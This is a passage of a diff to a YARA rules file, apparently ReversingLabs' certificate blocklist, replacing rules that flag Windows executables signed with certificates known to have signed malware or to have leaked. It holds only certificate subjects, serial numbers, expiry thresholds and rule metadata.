-		logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1126-L1142"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10591,21 +35256,21 @@ rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MOCOMSYS INC" and pe.signatures [ i ] . serial == "03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b"
+		id = "47a10658-c5c4-58b6-b154-7babcfbc50a2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8186-L8204"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1144-L1160"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10615,21 +35280,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) and 1605830400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIXELPLUS CO., LTD." and pe.signatures [ i ] . serial == "0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a"
+		id = "924c210b-f72a-51eb-af2a-9897faf8f677"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8206-L8224"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1162-L1178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10639,21 +35304,21 @@ rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHAT LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures [ i ] . serial == "ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Police Mutual Aid Association" and pe.signatures [ i ] . serial == "06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c33d798a-854c-5fab-afbe-e94d142befa7"
+		id = "73222a8d-df63-5784-b5a2-0d936db8ddcb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8226-L8244"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1180-L1196"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10663,21 +35328,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures [ i ] . serial == "ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" ) and 1606089600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jessica Karam" and pe.signatures [ i ] . serial == "09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326"
+		id = "54073485-e9a5-5a0b-a907-0e8a528da85d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8246-L8262"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1198-L1214"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10687,21 +35352,21 @@ rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Banco do Brasil S.A." and pe.signatures [ i ] . serial == "7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "00e096f6-2955-5936-9a75-f537c2da3621"
+		id = "4d99e2ee-823e-568d-88b1-48aaf6d44286"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8264-L8280"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1216-L1234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10711,21 +35376,21 @@ rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MINDSTORM LLC" and ( pe.signatures [ i ] . serial == "00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures [ i ] . serial == "d1:83:6b:d3:7c:33:1a:67" ) and 1422835199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83"
+		id = "19e1bce7-ad37-5223-b934-b20e78dfd071"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8282-L8298"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1236-L1252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10735,21 +35400,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PILOTE SPRL" and pe.signatures [ i ] . serial == "2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "02f2bf36-e573-502c-8ecc-843a6e627c2b"
+		id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8300-L8316"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1254-L1270"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10759,21 +35424,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "a2795796-2897-55ad-936c-456c3b93bf14"
+		id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8318-L8336"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1272-L1288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10783,21 +35448,21 @@ rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and ( pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures [ i ] . serial == "a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" ) and 1611792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "ee861c79-fea2-5931-873d-b76e5bdef593"
+		id = "d95b5e25-679c-57f8-b790-8f5633a23e4b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8338-L8356"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1290-L1306"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10807,21 +35472,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and ( pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures [ i ] . serial == "bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" ) and 1607472000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e"
+		id = "8f316011-9a29-5366-a26a-1fe20651ef17"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8358-L8374"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1308-L1324"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10831,21 +35496,21 @@ rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "17571f1e-1dce-5216-8f45-467e5d77ccf1"
+		id = "af912c64-334d-51f5-8ca4-707fcec512ba"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8376-L8394"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1326-L1342"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10855,21 +35520,21 @@ rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Semantic" and ( pe.signatures [ i ] . serial == "00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures [ i ] . serial == "e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" ) and 1611532800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "03e861a0-156e-5366-a312-dc2aa73b0393"
+		id = "da1895fd-ec29-513d-b8ae-2317f84b8280"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8396-L8414"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1344-L1360"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10879,21 +35544,21 @@ rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and ( pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures [ i ] . serial == "83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" ) and 1612137600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "fdb1903b-15c1-5cb7-892f-58957303d3b4"
+		id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
